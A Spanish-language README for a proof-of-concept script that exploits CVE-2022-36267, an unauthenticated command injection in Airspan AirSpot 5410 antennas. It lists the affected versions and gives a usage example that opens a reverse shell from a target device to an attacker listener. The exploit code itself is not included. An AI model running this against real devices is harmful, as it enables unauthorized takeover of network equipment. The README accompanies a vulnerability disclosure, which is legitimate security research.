
PoC Script para CVE-2022-36267: Explota una vulnerabilidad de inyección de comandos remotos sin autenticación en la antena Airspan AirSpot 5410.
Este repositorio contiene un script de shell inversa de Prueba de Concepto (PoC) para explotar CVE-2022-36267, una vulnerabilidad crítica en dispositivos Airspan AirSpot 5410. El script es una demostración práctica que complementa el análisis en profundidad proporcionado en la publicación del blog "Airspan AirSpot 5410 - Informe de Vulnerabilidad".
Todos los dispositivos Airspan AirSpot 5410 desde la versión 0.3.4.1-4 y anteriores.
# Usage: python AirSpot-5410.py --RHOST <Target-IP> --RPORT <Target-Port> --LHOST <Local-IP> --LPORT <Local-Port>
# Example: python AirSpot-5410.py --RHOST 192.168.1.1 --RPORT 443 --LHOST 192.168.1.100 --LPORT 4444

SOLO CON FINES EDUCATIVOS.